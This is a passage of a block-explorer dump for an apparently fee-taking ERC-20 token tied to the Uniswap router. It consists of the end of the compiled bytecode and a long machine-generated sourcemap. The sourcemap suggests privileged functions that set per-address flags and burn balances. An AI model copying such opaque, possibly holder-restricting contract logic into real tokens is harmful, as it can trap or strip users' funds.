d60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610783565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610f79565b611868306108fa565b60000361187157565b60008061187d306108fa565b600654909150479060009061189a906001600160a01b03166108fa565b90506000601154841115611900574792506118b6846000611907565b6118c08347611daa565b94506011548211156118e857806118d85760006118da565b845b6118e49086611e5c565b6017555b84601760008282546118fa9190611d16565b90915550505b5050505050565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061193c5761193c611e7e565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156119ba573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906119de9190611d5f565b816001815181106119f1576119f1611e7e565b6001600160a01b03928316602091820292909201015260405163095ea7b360e01b81527f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d90911660048201526000196024820152309063095ea7b3906044016020604051808303816000875af1158015611a6f573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611a939190611d42565b5060405163791ac94760e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063791ac94790611ae89086908690869030904290600401611e94565b600060405180830381600087803b158015611b0257600080fd5b505af1158015611b16573d6000803e3d6000fd5b50505050505050565b600060208083528351808285015260005b81811015611b4c57858101830151858201604001528201611b30565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610d0a57600080fd5b60008060408385031215611b9557600080fd5b8235611ba081611b6d565b946020939093013593505050565b600080600060608486031215611bc357600080fd5b8335611bce81611b6d565b92506020840135611bde81611b6d565b929592945050506040919091013590565b600060208284031215611c0157600080fd5b8135611c0c81611b6d565b9392505050565b60008060408385031215611c2657600080fd5b8235611c3181611b6d565b91506020830135611c4181611b6d565b809150509250929050565b8015158114610d0a57600080fd5b60008060408385031215611c6d57600080fd5b8235611c7881611b6d565b91506020830135611c4181611c4c565b634e487b7160e01b600052602160045260246000fd5b6020810160048310611cc057634e487b7160e01b600052602160045260246000fd5b91905290565b600181811c90821680611cda57607f821691505b602082108103611cfa57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808201808211156106fd576106fd611d00565b600060208284031215611d3b57600080fd5b5051919050565b600060208284031215611d5457600080fd5b8151611c0c81611c4c565b600060208284031215611d7157600080fd5b8151611c0c81611b6d565b600080600060608486031215611d9157600080fd5b8351925060208401519150604084015190509250925092565b818103818111156106fd576106fd611d00565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b80820281158282048414176106fd576106fd611d00565b600082611e7957634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611ee45784516001600160a01b031683529383019391830191600101611ebf565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220dfbf018d6298827807e781456e6f3d2b880cb3da02d407a2127a4320a2e74cbf64736f6c63430008120033

Deployed Bytecode Sourcemap

26761:7973:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;27002:64;;;;;;;;;;-1:-1:-1;27002:64:0;;;;-1:-1:-1;;;;;27002:64:0;;;;;;-1:-1:-1;;;;;178:32:1;;;160:51;;148:2;133:18;27002:64:0;;;;;;;;27489:50;;;;;;;;;;;;;;;;;;;368:25:1;;;356:2;341:18;27489:50:0;222:177:1;9877:100:0;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;12237:201::-;;;;;;;;;;-1:-1:-1;12237:201:0;;;;;:::i;:::-;;:::i;:::-;;;1578:14:1;;1571:22;1553:41;;1541:2;1526:18;12237:201:0;1413:187:1;26806:51:0;;;;;;;;;;;;;;;11006:108;;;;;;;;;;-1:-1:-1;11094:12:0;;11006:108;;13018:261;;;;;;;;;;-1:-1:-1;13018:261:0;;;;;:::i;:::-;;:::i;32087:178::-;;;;;;;;;;;;;:::i;:::-;;27266:34;;;;;;;;;;-1:-1:-1;27266:34:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;10848:93;;;;;;;;;;-1:-1:-1;10848:93:0;;10931:2;2695:36:1;;2683:2;2668:18;10848:93:0;2553:184:1;27586:32:0;;;;;;;;;;;;;;;;13688:238;;;;;;;;;;-1:-1:-1;13688:238:0;;;;;:::i;:::-;;:::i;27548:31::-;;;;;;;;;;;;;;;;26864:28;;;;;;;;;;-1:-1:-1;26864:28:0;;;;-1:-1:-1;;;;;26864:28:0;;;34425:185;;;;;;;;;;-1:-1:-1;34425:185:0;;;;;:::i;:::-;;:::i;32277:155::-;;;;;;;;;;;;;:::i;11177:127::-;;;;;;;;;;-1:-1:-1;11177:127:0;;;;;:::i;:::-;;:::i;3303:103::-;;;;;;;;;;;;;:::i;34303:110::-;;;;;;;;;;;;;:::i;27079:50::-;;;;;;;;;;-1:-1:-1;27079:50:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;27371:52;;;;;;;;;;;;;;;;2516:87;;;;;;;;;;-1:-1:-1;2589:6:0;;-1:-1:-1;;;;;2589:6:0;2516:87;;10096:104;;;;;;;;;;;;;:::i;28657:485::-;;;:::i;32440:184::-;;;;;;;;;;;;;:::i;14429:436::-;;;;;;;;;;-1:-1:-1;14429:436:0;;;;;:::i;:::-;;:::i;11510:193::-;;;;;;;;;;-1:-1:-1;11510:193:0;;;;;:::i;:::-;;:::i;27430:52::-;;;;;;;;;;;;;;;;27878:30;;;;;;;;;;;;;;;;29154:138;;;;;;;;;;-1:-1:-1;29154:138:0;;;;;:::i;:::-;;:::i;11766:151::-;;;;;;;;;;-1:-1:-1;11766:151:0;;;;;:::i;:::-;;:::i;27221:38::-;;;;;;;;;;-1:-1:-1;27221:38:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;34618:113;;;;;;;;;;-1:-1:-1;34618:113:0;;;;;:::i;:::-;;:::i;3561:201::-;;;;;;;;;;-1:-1:-1;3561:201:0;;;;;:::i;:::-;;:::i;27187:25::-;;;;;;;;;;-1:-1:-1;27187:25:0;;;;;;;;;;;;;;;:::i;9877:100::-;9931:13;9964:5;9957:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9877:100;:::o;12237:201::-;12320:4;984:10;12376:32;984:10;12392:7;12401:6;12376:8;:32::i;:::-;12426:4;12419:11;;;12237:201;;;;;:::o;13018:261::-;13115:4;984:10;13173:38;13189:4;984:10;13204:6;13173:15;:38::i;:::-;13222:27;13232:4;13238:2;13242:6;13222:9;:27::i;:::-;-1:-1:-1;13267:4:0;;13018:261;-1:-1:-1;;;;13018:261:0:o;32087:178::-;2324:13;:11;:13::i;:::-;32150:14:::1;::::0;::::1;::::0;::::1;;;32149:15;32141:54;;;::::0;-1:-1:-1;;;32141:54:0;;4707:2:1;32141:54:0::1;::::0;::::1;4689:21:1::0;4746:2;4726:18;;;4719:30;4785:28;4765:18;;;4758:56;4831:18;;32141:54:0::1;;;;;;;;;32206:14;:21:::0;;-1:-1:-1;;32238:19:0;;;;;32087:178::o;13688:238::-;13776:4;984:10;13832:64;984:10;13848:7;13885:10;13857:25;984:10;13848:7;13857:9;:25::i;:::-;:38;;;;:::i;:::-;13832:8;:64::i;34425:185::-;2324:13;:11;:13::i;:::-;34531:7:::1;::::0;34553:38:::1;::::0;-1:-1:-1;;;34553:38:0;;34585:4:::1;34553:38;::::0;::::1;160:51:1::0;-1:-1:-1;;;;;34494:22:0;;::::1;::::0;::::1;::::0;34531:7;::::1;::::0;34494:22;;34553:23:::1;::::0;133:18:1;;34553:38:0::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;34494:108;::::0;-1:-1:-1;;;;;;34494:108:0::1;::::0;;;;;;-1:-1:-1;;;;;5503:32:1;;;34494:108:0::1;::::0;::::1;5485:51:1::0;5552:18;;;5545:34;5458:18;;34494:108:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;34425:185:::0;:::o;32277:155::-;32338:7;;32356:15;;32330:42;;32313:4;;-1:-1:-1;;;;;32338:7:0;;32330:42;;;;;32313:4;32330:42;32313:4;32330:42;32356:15;32338:7;32330:42;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;32401:1:0;32383:15;:19;32420:4;;32277:155::o;11177:127::-;-1:-1:-1;;;;;11278:18:0;11251:7;11278:18;;;;;;;;;;;;11177:127::o;3303:103::-;2324:13;:11;:13::i;:::-;3368:30:::1;3395:1;3368:18;:30::i;:::-;3303:103::o:0;34303:110::-;2324:13;:11;:13::i;:::-;27345:19:::1;34357:11;:21:::0;;;34380:15:::1;:25:::0;34303:110::o;10096:104::-;10152:13;10185:7;10178:14;;;;;:::i;28657:485::-;2324:13;:11;:13::i;:::-;28755:15:::1;-1:-1:-1::0;;;;;28755:23:0::1;;:25;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;28737:55:0::1;;28801:4;28808:15;-1:-1:-1::0;;;;;28808:20:0::1;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;28737:94;::::0;-1:-1:-1;;;;;;28737:94:0::1;::::0;;;;;;-1:-1:-1;;;;;6326:15:1;;;28737:94:0::1;::::0;::::1;6308:34:1::0;6378:15;;6358:18;;;6351:43;6243:18;;28737:94:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;28721:13;:110:::0;;-1:-1:-1;;;;;;28721:110:0::1;-1:-1:-1::0;;;;;28721:110:0;;;::::1;::::0;;;::::1;::::0;;28842:68:::1;28859:4;28874:15;-1:-1:-1::0;;28842:8:0::1;:68::i;:::-;28921:15;-1:-1:-1::0;;;;;28921:31:0::1;;28960:9;28993:4;29013:24;29031:4;29013:9;:24::i;:::-;29052:1;29069::::0;29086:7:::1;2589:6:::0;;-1:-1:-1;;;;;2589:6:0;;2516:87;29086:7:::1;28921:213;::::0;::::1;::::0;;;-1:-1:-1;;;;;;28921:213:0;;;-1:-1:-1;;;;;6764:15:1;;;28921:213:0::1;::::0;::::1;6746:34:1::0;6796:18;;;6789:34;;;;6839:18;;;6832:34;;;;6882:18;;;6875:34;6946:15;;;6925:19;;;6918:44;29108:15:0::1;6978:19:1::0;;;6971:35;6680:19;;28921:213:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;28657:485::o:0;32440:184::-;32493:4;2324:13;:11;:13::i;:::-;-1:-1:-1;32510:12:0::1;:27:::0;;-1:-1:-1;;32510:27:0::1;32525:12;32510:27;::::0;;;32548:12:::1;:16:::0;;;32575:13:::1;:17:::0;;;32510:27;32440:184::o;14429:436::-;14522:4;984:10;14522:4;14605:25;984:10;14622:7;14605:9;:25::i;:::-;14578:52;;14669:15;14649:16;:35;;14641:85;;;;-1:-1:-1;;;14641:85:0;;7530:2:1;14641:85:0;;;7512:21:1;7569:2;7549:18;;;7542:30;7608:34;7588:18;;;7581:62;-1:-1:-1;;;7659:18:1;;;7652:35;7704:19;;14641:85:0;7328:401:1;14641:85:0;14762:60;14771:5;14778:7;14806:15;14787:16;:34;14762:8;:60::i;11510:193::-;11589:4;984:10;11645:28;984:10;11662:2;11666:6;11645:9;:28::i;29154:138::-;2397:16;:14;:16::i;:::-;-1:-1:-1;;;;;29227:8:0;::::1;29238:5;29227:8:::0;;;:2:::1;:8;::::0;;;;:16;;-1:-1:-1;;29227:16:0::1;::::0;;29275:8:::1;::::0;29245:39:::1;::::0;29230:4;;29257:15:::1;29230:4:::0;29257:9:::1;:15::i;:::-;:26;;;;:::i;:::-;29245:5;:39::i;:::-;29154:138:::0;:::o;11766:151::-;-1:-1:-1;;;;;11882:18:0;;;11855:7;11882:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11766:151::o;34618:113::-;2324:13;:11;:13::i;:::-;-1:-1:-1;;;;;34705:8:0;;;::::1;;::::0;;;:2:::1;:8;::::0;;;;:18;;-1:-1:-1;;34705:18:0::1;::::0;::::1;;::::0;;;::::1;::::0;;34618:113::o;3561:201::-;2324:13;:11;:13::i;:::-;-1:-1:-1;;;;;3650:22:0;::::1;3642:73;;;::::0;-1:-1:-1;;;3642:73:0;;8069:2:1;3642:73:0::1;::::0;::::1;8051:21:1::0;8108:2;8088:18;;;8081:30;8147:34;8127:18;;;8120:62;-1:-1:-1;;;8198:18:1;;;8191:36;8244:19;;3642:73:0::1;7867:402:1::0;3642:73:0::1;3726:28;3745:8;3726:18;:28::i;18422:346::-:0;-1:-1:-1;;;;;18524:19:0;;18516:68;;;;-1:-1:-1;;;18516:68:0;;8476:2:1;18516:68:0;;;8458:21:1;8515:2;8495:18;;;8488:30;8554:34;8534:18;;;8527:62;-1:-1:-1;;;8605:18:1;;;8598:34;8649:19;;18516:68:0;8274:400:1;18516:68:0;-1:-1:-1;;;;;18603:21:0;;18595:68;;;;-1:-1:-1;;;18595:68:0;;8881:2:1;18595:68:0;;;8863:21:1;8920:2;8900:18;;;8893:30;8959:34;8939:18;;;8932:62;-1:-1:-1;;;9010:18:1;;;9003:32;9052:19;;18595:68:0;8679:398:1;18595:68:0;-1:-1:-1;;;;;18676:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18728:32;;368:25:1;;;18728:32:0;;341:18:1;18728:32:0;;;;;;;18422:346;;;:::o;19059:419::-;19160:24;19187:25;19197:5;19204:7;19187:9;:25::i;:::-;19160:52;;-1:-1:-1;;19227:16:0;:37;19223:248;;19309:6;19289:16;:26;;19281:68;;;;-1:-1:-1;;;19281:68:0;;9284:2:1;19281:68:0;;;9266:21:1;9323:2;9303:18;;;9296:30;9362:31;9342:18;;;9335:59;9411:18;;19281:68:0;9082:353:1;19281:68:0;19393:51;19402:5;19409:7;19437:6;19418:16;:25;19393:8;:51::i;:::-;19149:329;19059:419;;;:::o;29300:2779::-;-1:-1:-1;;;;;29434:18:0;;29426:68;;;;-1:-1:-1;;;29426:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;29513:16:0;;29505:64;;;;-1:-1:-1;;;29505:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;29585:12:0;;;;;;:6;:12;;;;;;;;29584:13;:28;;;;-1:-1:-1;;;;;;29602:10:0;;;;;;:6;:10;;;;;;;;29601:11;29584:28;29580:107;;;29637:14;;;;;;;29629:46;;;;-1:-1:-1;;;29629:46:0;;10452:2:1;29629:46:0;;;10434:21:1;10491:2;10471:18;;;10464:30;-1:-1:-1;;;10510:18:1;;;10503:49;10569:18;;29629:46:0;10250:343:1;29629:46:0;-1:-1:-1;;;;;29704:8:0;;;;;;:2;:8;;;;;;;;29703:9;:20;;;;-1:-1:-1;;;;;;29717:6:0;;;;;;:2;:6;;;;;;;;29716:7;29703:20;29699:398;;;29751:13;;-1:-1:-1;;;;;29745:19:0;;;29751:13;;29745:19;29741:345;;29803:11;;29793:6;:21;;29785:95;;;;-1:-1:-1;;;29785:95:0;;10800:2:1;29785:95:0;;;10782:21:1;10839:2;10819:18;;;10812:30;10878:34;10858:18;;;10851:62;10949:31;10929:18;;;10922:59;10998:19;;29785:95:0;10598:425:1;29785:95:0;29957:15;;29939:13;29949:2;29939:9;:13::i;:::-;29930:22;;:6;:22;:::i;:::-;29929:43;;29899:171;;;;-1:-1:-1;;;29899:171:0;;11230:2:1;29899:171:0;;;11212:21:1;11269:2;11249:18;;;11242:30;11308:34;11288:18;;;11281:62;-1:-1:-1;;;11359:18:1;;;11352:52;11421:19;;29899:171:0;11028:418:1;29899:171:0;-1:-1:-1;;;;;30156:12:0;;30109:22;30156:12;;;:6;:12;;;;;;30134:6;;30156:12;;30155:13;:28;;;;-1:-1:-1;;;;;;30173:10:0;;;;;;:6;:10;;;;;;;;30172:11;30155:28;30151:1869;;;30213:13;;-1:-1:-1;;;;;30205:21:0;;;30213:13;;30205:21;;:44;;-1:-1:-1;30236:13:0;;-1:-1:-1;;;;;30230:19:0;;;30236:13;;30230:19;30205:44;30200:1809;;;30289:11;;30279:6;:21;;30271:91;;;;-1:-1:-1;;;30271:91:0;;11653:2:1;30271:91:0;;;11635:21:1;11692:2;11672:18;;;11665:30;11731:34;11711:18;;;11704:62;11802:27;11782:18;;;11775:55;11847:19;;30271:91:0;11451:421:1;30271:91:0;30388:13;;-1:-1:-1;;;;;30388:21:0;;;:13;;:21;:32;;;;-1:-1:-1;;;;;;30414:6:0;;;;;;:2;:6;;;;;;;;30413:7;30388:32;:57;;;;-1:-1:-1;;;;;;30424:21:0;;30440:4;30424:21;;30388:57;30384:423;;;30492:12;30476;;;;:28;;;;;;;;:::i;:::-;;30472:114;;-1:-1:-1;;;;;30533:22:0;;;;;;:18;:22;;;;;:29;;-1:-1:-1;;30533:29:0;30558:4;30533:29;;;30472:114;30610:17;30656:3;30640:12;;30631:6;:21;;;;:::i;:::-;30630:29;;;;:::i;:::-;30610:49;;30682:47;30698:4;30712;30719:9;30682:15;:47::i;:::-;30769:18;30778:9;30769:6;:18;:::i;:::-;30752:35;;30447:360;30384:423;30853:13;;-1:-1:-1;;;;;30853:19:0;;;:13;;:19;:53;;;;-1:-1:-1;;;;;;30898:8:0;;;;;;:2;:8;;;;;;;;30897:9;30853:53;:97;;;;-1:-1:-1;;;;;;30931:19:0;;30945:4;30931:19;;30853:97;:134;;;;-1:-1:-1;30975:12:0;;;;;;;30853:134;:174;;;;-1:-1:-1;31014:13:0;;;;31013:14;30853:174;30827:773;;;31110:13;;-1:-1:-1;;;;;31150:24:0;;31092:15;31150:24;;;:18;:24;;;;;;;;:32;;:24;:32;31146:110;;-1:-1:-1;31221:11:0;;31146:110;31280:13;:20;;-1:-1:-1;;31280:20:0;31296:4;31280:20;;;31323:16;:14;:16::i;:::-;31362:13;:21;;-1:-1:-1;;31362:21:0;;;31378:5;31449:3;31429:16;31438:7;31429:6;:16;:::i;:::-;31428:24;;;;:::i;:::-;31408:44;;31475:47;31491:4;31505;31512:9;31475:15;:47::i;:::-;31562:18;31571:9;31562:6;:18;:::i;:::-;31545:35;;31047:553;;30827:773;30200:1809;;;-1:-1:-1;;;;;31679:24:0;;;;;;:18;:24;;;;;;;;:32;;:24;:32;:76;;;;-1:-1:-1;31736:13:0;;-1:-1:-1;;;;;31736:19:0;;;:13;;:19;;31679:76;31653:341;;;31798:17;31843:3;31828:11;;31819:6;:20;;;;:::i;:::-;31818:28;;;;:::i;:::-;31798:48;;31869:47;31885:4;31899;31906:9;31869:15;:47::i;:::-;31956:18;31965:9;31956:6;:18;:::i;:::-;31939:35;;31775:219;31653:341;32030:41;32046:4;32052:2;32056:14;32030:15;:41::i;2681:132::-;2589:6;;-1:-1:-1;;;;;2589:6:0;984:10;2745:23;2737:68;;;;-1:-1:-1;;;2737:68:0;;12474:2:1;2737:68:0;;;12456:21:1;;;12493:18;;;12486:30;12552:34;12532:18;;;12525:62;12604:18;;2737:68:0;12272:356:1;3922:191:0;4015:6;;;-1:-1:-1;;;;;4032:17:0;;;-1:-1:-1;;;;;;4032:17:0;;;;;;;4065:40;;4015:6;;;4032:17;4015:6;;4065:40;;3996:16;;4065:40;3985:128;3922:191;:::o;2821:138::-;2904:7;;-1:-1:-1;;;;;2904:7:0;984:10;-1:-1:-1;;;;;2888:23:0;;2880:71;;;;-1:-1:-1;;;2880:71:0;;12835:2:1;2880:71:0;;;12817:21:1;12874:2;12854:18;;;12847:30;12913:34;12893:18;;;12886:62;-1:-1:-1;;;12964:18:1;;;12957:33;13007:19;;2880:71:0;12633:399:1;17309:675:0;-1:-1:-1;;;;;17393:21:0;;17385:67;;;;-1:-1:-1;;;17385:67:0;;13239:2:1;17385:67:0;;;13221:21:1;13278:2;13258:18;;;13251:30;13317:34;13297:18;;;13290:62;-1:-1:-1;;;13368:18:1;;;13361:31;13409:19;;17385:67:0;13037:397:1;17385:67:0;-1:-1:-1;;;;;17552:18:0;;17527:22;17552:18;;;;;;;;;;;17589:24;;;;17581:71;;;;-1:-1:-1;;;17581:71:0;;13641:2:1;17581:71:0;;;13623:21:1;13680:2;13660:18;;;13653:30;13719:34;13699:18;;;13692:62;-1:-1:-1;;;13770:18:1;;;13763:32;13812:19;;17581:71:0;13439:398:1;17581:71:0;-1:-1:-1;;;;;17688:18:0;;:9;:18;;;;;;;;;;;17709:23;;;17688:44;;17827:12;:22;;;;;;;17878:37;368:25:1;;;17688:9:0;;:18;17878:37;;341:18:1;17878:37:0;;;;;;;28921:213:::1;;;28657:485::o:0;15335:806::-;-1:-1:-1;;;;;15432:18:0;;15424:68;;;;-1:-1:-1;;;15424:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15511:16:0;;15503:64;;;;-1:-1:-1;;;15503:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15653:15:0;;15631:19;15653:15;;;;;;;;;;;15687:21;;;;15679:72;;;;-1:-1:-1;;;15679:72:0;;14044:2:1;15679:72:0;;;14026:21:1;14083:2;14063:18;;;14056:30;14122:34;14102:18;;;14095:62;-1:-1:-1;;;14173:18:1;;;14166:36;14219:19;;15679:72:0;13842:402:1;15679:72:0;-1:-1:-1;;;;;15787:15:0;;;:9;:15;;;;;;;;;;;15805:20;;;15787:38;;16005:13;;;;;;;;;;:23;;;;;;16057:26;;368:25:1;;;16005:13:0;;16057:26;;341:18:1;16057:26:0;;;;;;;16096:37;28657:485;32632:844;32682:24;32700:4;32682:9;:24::i;:::-;32710:1;32682:29;32678:68;;32632:844::o;32678:68::-;32756:19;32801:28;32832:24;32850:4;32832:9;:24::i;:::-;32962:7;;32801:55;;-1:-1:-1;32895:21:0;;32871;;32952:18;;-1:-1:-1;;;;;32962:7:0;32952:9;:18::i;:::-;32931:39;;32985:12;33039:13;;33016:20;:36;33012:446;;;33089:21;33073:37;;33129:42;33147:20;33169:1;33129:17;:42::i;:::-;33204:37;33228:13;33204:21;:37;:::i;:::-;33190:51;;33277:13;;33264:10;:26;33260:134;;;33348:7;:25;;33372:1;33348:25;;;33358:11;33348:25;33333:41;;:11;:41;:::i;:::-;33315:15;:59;33260:134;33431:11;33412:15;;:30;;;;;;;:::i;:::-;;;;-1:-1:-1;;33012:446:0;32786:683;;;;32667:809;32632:844::o;33669:588::-;33810:16;;;33824:1;33810:16;;;;;;;;33786:21;;33810:16;;;;;;;;;;-1:-1:-1;33810:16:0;33786:40;;33855:4;33837;33842:1;33837:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;33837:23:0;;;-1:-1:-1;;;;;33837:23:0;;;;;33881:15;-1:-1:-1;;;;;33881:20:0;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;33871:4;33876:1;33871:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;33871:32:0;;;:7;;;;;;;;;:32;33916:111;;-1:-1:-1;;;33916:111:0;;33968:15;5503:32:1;;;33916:111:0;;;5485:51:1;-1:-1:-1;;5552:18:1;;;5545:34;33931:4:0;;33916:29;;5458:18:1;;33916:111:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;34040:209:0;;-1:-1:-1;;;34040:209:0;;-1:-1:-1;;;;;34040:15:0;:66;;;;:209;;34121:11;;34147:14;;34176:4;;34203;;34223:15;;34040:209;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33775:482;33669:588;;:::o;404:548:1:-;516:4;545:2;574;563:9;556:21;606:6;600:13;649:6;644:2;633:9;629:18;622:34;674:1;684:140;698:6;695:1;692:13;684:140;;;793:14;;;789:23;;783:30;759:17;;;778:2;755:26;748:66;713:10;;684:140;;;688:3;873:1;868:2;859:6;848:9;844:22;840:31;833:42;943:2;936;932:7;927:2;919:6;915:15;911:29;900:9;896:45;892:54;884:62;;;;404:548;;;;:::o;957:131::-;-1:-1:-1;;;;;1032:31:1;;1022:42;;1012:70;;1078:1;1075;1068:12;1093:315;1161:6;1169;1222:2;1210:9;1201:7;1197:23;1193:32;1190:52;;;1238:1;1235;1228:12;1190:52;1277:9;1264:23;1296:31;1321:5;1296:31;:::i;:::-;1346:5;1398:2;1383:18;;;;1370:32;;-1:-1:-1;;;1093:315:1:o;1840:456::-;1917:6;1925;1933;1986:2;1974:9;1965:7;1961:23;1957:32;1954:52;;;2002:1;1999;1992:12;1954:52;2041:9;2028:23;2060:31;2085:5;2060:31;:::i;:::-;2110:5;-1:-1:-1;2167:2:1;2152:18;;2139:32;2180:33;2139:32;2180:33;:::i;:::-;1840:456;;2232:7;;-1:-1:-1;;;2286:2:1;2271:18;;;;2258:32;;1840:456::o;2301:247::-;2360:6;2413:2;2401:9;2392:7;2388:23;2384:32;2381:52;;;2429:1;2426;2419:12;2381:52;2468:9;2455:23;2487:31;2512:5;2487:31;:::i;:::-;2537:5;2301:247;-1:-1:-1;;;2301:247:1:o;2742:388::-;2810:6;2818;2871:2;2859:9;2850:7;2846:23;2842:32;2839:52;;;2887:1;2884;2877:12;2839:52;2926:9;2913:23;2945:31;2970:5;2945:31;:::i;:::-;2995:5;-1:-1:-1;3052:2:1;3037:18;;3024:32;3065:33;3024:32;3065:33;:::i;:::-;3117:7;3107:17;;;2742:388;;;;;:::o;3135:118::-;3221:5;3214:13;3207:21;3200:5;3197:32;3187:60;;3243:1;3240;3233:12;3258:382;3323:6;3331;3384:2;3372:9;3363:7;3359:23;3355:32;3352:52;;;3400:1;3397;3390:12;3352:52;3439:9;3426:23;3458:31;3483:5;3458:31;:::i;:::-;3508:5;-1:-1:-1;3565:2:1;3550:18;;3537:32;3578:30;3537:32;3578:30;:::i;3645:127::-;3706:10;3701:3;3697:20;3694:1;3687:31;3737:4;3734:1;3727:15;3761:4;3758:1;3751:15;3777:338;3919:2;3904:18;;3952:1;3941:13;;3931:144;;3997:10;3992:3;3988:20;3985:1;3978:31;4032:4;4029:1;4022:15;4060:4;4057:1;4050:15;3931:144;4084:25;;;3777:338;:::o;4120:380::-;4199:1;4195:12;;;;4242;;;4263:61;;4317:4;4309:6;4305:17;4295:27;;4263:61;4370:2;4362:6;4359:14;4339:18;4336:38;4333:161;;4416:10;4411:3;4407:20;4404:1;4397:31;4451:4;4448:1;4441:15;4479:4;4476:1;4469:15;4333:161;;4120:380;;;:::o;4860:127::-;4921:10;4916:3;4912:20;4909:1;4902:31;4952:4;4949:1;4942:15;4976:4;4973:1;4966:15;4992:125;5057:9;;;5078:10;;;5075:36;;;5091:18;;:::i;5122:184::-;5192:6;5245:2;5233:9;5224:7;5220:23;5216:32;5213:52;;;5261:1;5258;5251:12;5213:52;-1:-1:-1;5284:16:1;;5122:184;-1:-1:-1;5122:184:1:o;5590:245::-;5657:6;5710:2;5698:9;5689:7;5685:23;5681:32;5678:52;;;5726:1;5723;5716:12;5678:52;5758:9;5752:16;5777:28;5799:5;5777:28;:::i;5840:251::-;5910:6;5963:2;5951:9;5942:7;5938:23;5934:32;5931:52;;;5979:1;5976;5969:12;5931:52;6011:9;6005:16;6030:31;6055:5;6030:31;:::i;7017:306::-;7105:6;7113;7121;7174:2;7162:9;7153:7;7149:23;7145:32;7142:52;;;7190:1;7187;7180:12;7142:52;7219:9;7213:16;7203:26;;7269:2;7258:9;7254:18;7248:25;7238:35;;7313:2;7302:9;7298:18;7292:25;7282:35;;7017:306;;;;;:::o;7734:128::-;7801:9;;;7822:11;;;7819:37;;;7836:18;;:::i;9440:401::-;9642:2;9624:21;;;9681:2;9661:18;;;9654:30;9720:34;9715:2;9700:18;;9693:62;-1:-1:-1;;;9786:2:1;9771:18;;9764:35;9831:3;9816:19;;9440:401::o;9846:399::-;10048:2;10030:21;;;10087:2;10067:18;;;10060:30;10126:34;10121:2;10106:18;;10099:62;-1:-1:-1;;;10192:2:1;10177:18;;10170:33;10235:3;10220:19;;9846:399::o;11877:168::-;11950:9;;;11981;;11998:15;;;11992:22;;11978:37;11968:71;;12019:18;;:::i;12050:217::-;12090:1;12116;12106:132;;12160:10;12155:3;12151:20;12148:1;12141:31;12195:4;12192:1;12185:15;12223:4;12220:1;12213:15;12106:132;-1:-1:-1;12252:9:1;;12050:217::o;14381:127::-;14442:10;14437:3;14433:20;14430:1;14423:31;14473:4;14470:1;14463:15;14497:4;14494:1;14487:15;14513:972;14767:4;14815:3;14804:9;14800:19;14846:6